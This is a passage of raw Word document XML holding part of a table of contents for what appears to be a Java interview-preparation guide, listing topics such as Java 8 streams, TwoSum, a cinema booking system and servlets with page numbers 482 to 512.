                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307843 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>482</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F825CED" w14:textId="4091FC9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4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Minimum hops for staircase</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307844 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>483</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7733EAC1" w14:textId="1C8BB1F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4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Sort Student data based on age using java 8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307845 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>483</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1DC1D54B" w14:textId="11658E8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4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Explain logic of frequency of each character in String</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307846 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>484</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3020565E" w14:textId="5B76C96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4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Count of unique character in String</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307847 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>486</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="639E2FDC" w14:textId="79F6D94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4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ThreeSum</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307848 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>486</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="469EF159" w14:textId="4CA75CA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4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TwoSum</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307849 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>488</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A9DC8C9" w14:textId="2504133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5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Explain output</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307850 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>489</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="722C9E9C" w14:textId="7C6F8CA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5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Code to add into the list and it should sort on the basis Address</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307851 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>490</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34CDAD79" w14:textId="33400B9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5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What is the output</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307852 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>491</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5184DCE3" w14:textId="7546969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5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What is the output</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307853 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>493</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="711AD9D0" w14:textId="37B1D70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5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What is the output</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307854 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>495</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E22E93D" w14:textId="517FCE2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5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First occurrence of non-repeating character in String</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307855 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>495</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C5A9990" w14:textId="24BD33E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5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Cinema Booking System</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307856 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>496</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AC1D8F8" w14:textId="43AF78B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5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Movie Booking System related code and data structure</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307857 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>500</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49AD69A6" w14:textId="1C674F2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5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Explain User registration functionality</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307858 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>500</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CBAF10E" w14:textId="30ACE2E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5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Write a method to register and check the available user in repo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307859 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>502</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4ABE6134" w14:textId="682EFF9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6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WhatsApp notification and mobile notification example</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307860 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>503</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04A3EDCC" w14:textId="5C526C4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6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Java 8 Stream Program</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307861 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>505</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FE65FC9" w14:textId="56ABF02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6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Given two Employee objects with the same name, determine the size of a Set after adding these objects, considering whether equals() and hashCode() are overridden in the Employee class.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307862 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>507</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63F57018" w14:textId="7129756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6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Person Management System, Write model classes</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307863 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>508</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59DA2CE6" w14:textId="0538BD2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6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Flatten a List of Lists using Java 8 Streams</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307864 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>510</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="21F947C7" w14:textId="1675C83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6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rogram - How to find the second largest element from the list?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307865 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>511</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7343570F" w14:textId="4380D09B" w:rsidR="00012799" w:rsidRDefault="00012799">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307866" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Advance Java / J2EE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307866 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>512</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="796FDC5F" w14:textId="1E237D1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6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servlet?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307867 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>512</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53662784" w14:textId="019B09B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6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servlet lifecycle?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307868 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
